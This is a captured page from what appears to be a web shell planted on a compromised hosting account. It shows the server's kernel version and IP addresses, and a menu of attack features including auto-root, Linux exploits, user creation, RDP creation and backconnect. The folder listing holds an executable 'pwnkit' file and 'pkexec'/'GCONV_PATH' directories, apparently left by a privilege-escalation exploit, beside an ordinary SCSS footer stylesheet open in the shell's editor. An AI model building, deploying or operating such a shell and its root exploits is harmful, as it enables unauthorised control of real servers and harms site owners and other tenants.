Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
assets /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_blog.scss
2.38
KB
-rw-r--r--
_blog_page.scss
29.56
KB
-rw-r--r--
_bradcam.scss
5.33
KB
-rw-r--r--
_color.scss
1.38
KB
-rw-r--r--
_common.scss
16.94
KB
-rw-r--r--
_contact-with-area.scss
464
B
-rw-r--r--
_contact.scss
2.82
KB
-rw-r--r--
_countDown.scss
1.77
KB
-rw-r--r--
_david-droga.scss
4.11
KB
-rw-r--r--
_details_page.scss
278
B
-rw-r--r--
_elements.scss
23.43
KB
-rw-r--r--
_extend.scss
2.53
KB
-rw-r--r--
_footer.scss
4.46
KB
-rw-r--r--
_h1-hero.scss
6.8
KB
-rw-r--r--
_headerMenu.scss
5.98
KB
-rw-r--r--
_mixins.scss
359
B
-rw-r--r--
_overlay.scss
1.03
KB
-rw-r--r--
_project-area.scss
4.12
KB
-rw-r--r--
_services.scss
585
B
-rw-r--r--
_services_section.scss
1.74
KB
-rw-r--r--
_support-company.scss
2.91
KB
-rw-r--r--
_team.scss
1.09
KB
-rw-r--r--
_testimonial.scss
2.75
KB
-rw-r--r--
_variables.scss
2.38
KB
-rw-r--r--
_wantToWork.scss
1.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
style.scss
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _footer.scss
.footer-area{ background:#070b11 ; position: relative; overflow: hidden; &::after { position: absolute; content: ""; background-image: url(../img/gallery/arrow_testimonial.png); left: 0; right: 0; top: 0; height: 60px; background-repeat: no-repeat; background-size: cover; margin-left: 0px; // Animated animation: slide1 1s ease-in-out infinite; @keyframes slide1 { 0%, 100% { transform: translate(0, 0); } 50% { transform: translate(5px, 0); -webkit-transform: translate(5px, 0); -moz-transform: translate(5px, 0); -ms-transform: translate(5px, 0); -o-transform: translate(5px, 0); } } } .footer-logo{ margin-bottom:30px; } .footer-pera{ .info1{ margin-bottom: 10px; line-height: 1.8; padding-right: 40px; @media #{$laptop}{ padding-right: 0px; } @media #{$lg}{ padding-right: 0px; } @media #{$md}{ padding-right: 0px; } @media #{$sm}{ padding-right: 0px; } @media #{$xs}{ padding-right: 0px; } } .info2{ margin-bottom: 50px; line-height: 1.8; } &.footer-pera2 p{ padding: 0; } } .footer-tittle{ & h4{ color:#fff; font-size: 35px; margin-bottom: 29px; font-weight: 500; font-family: $font_3; } & ul{ & li{ color: #9fa6bd; margin-bottom: 15px; & a{ color: #868c98; font-weight: 300; &:hover{ color: $theme-color; padding-left: 5px; } } } } p{ color: #9fa6bd; } } .footer-form{ margin-bottom: 30px; & form{ position: relative; & input{ width: 100%; height: 43px; padding: 10px 20px; border: 0; background: #1e293a; color: #fff; &::placeholder{ color: #9fa6bd; } } & .form-icon{ & button{ position: absolute; top: 0px; right: 0; background: none; border: 0; cursor: pointer; padding: 14px 22px; background:#0a0f17; line-height: 1; color: #fff; } } } } .info.error { color: $theme-color; } .footer-social{ & a{ width: 40px; height: 40px; font-size: 14px; border: 1px solid#fafafa; background:#fafafa; display: inline-block; line-height: 40px; text-align: center; color:#949eb2; margin-right: 5px; @include transition(.4s); } } // Copy Right .footer-copy-right{ padding-top: 20px; @media #{$xs}{ padding-top: 0px; } & p{ color: #9fa6bd; font-weight: 300; font-size: 16px; line-height: 2; margin-bottom: 12px; & i{ color:$theme-color; } & a{ color:$theme-color; &:hover{ color: $theme-color; } } } } } .footer-social{ a:hover { background: $theme-color; i{ color: #fff; @include transition(.4s); } } } .map-footer{ img{ width: 100%; } }
Close